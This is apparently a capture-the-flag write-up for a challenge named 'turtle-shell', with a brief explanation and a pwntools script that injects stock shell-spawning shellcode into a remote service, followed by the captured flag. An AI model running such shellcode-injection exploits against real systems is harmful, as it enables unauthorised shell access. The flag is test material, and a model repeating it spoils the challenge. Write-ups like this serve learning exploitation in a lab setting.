Description
A turtle without it's shell is a sad sight to see
Connect via: nc turtle.sdc.tf 1337
It's a simple and straightforward shellcode injection, which can be inferred from the name and from the fact that none of the protections are enabled.
The program simply takes our input and runs it as code, so we can use pwntools' shellcraft to spawn a shell.
#!/usr/bin/python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './turtle-shell'
# Load the binary so pwntools picks up its architecture (also prints checksec)
context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
# Toggle between a local process and the remote service
local = False
if local:
    io = process(exe)
else:
    io = remote('turtle.sdc.tf', 1337)
# =========================================================
# ADDRESSES
# =========================================================
# =========================================================
# EXPLOITS
# =========================================================
# Assemble pwntools' stock "spawn /bin/sh" shellcode for context.binary's arch
shellcode = asm(shellcraft.sh())
# flattening payload here
payload = flat([
    shellcode,
])
io.sendline(payload)
io.interactive()
sdctf{w0w_y0u_m4d3_7h3_7urT13_c0m3_0u7_0f_1t5_5h3l1}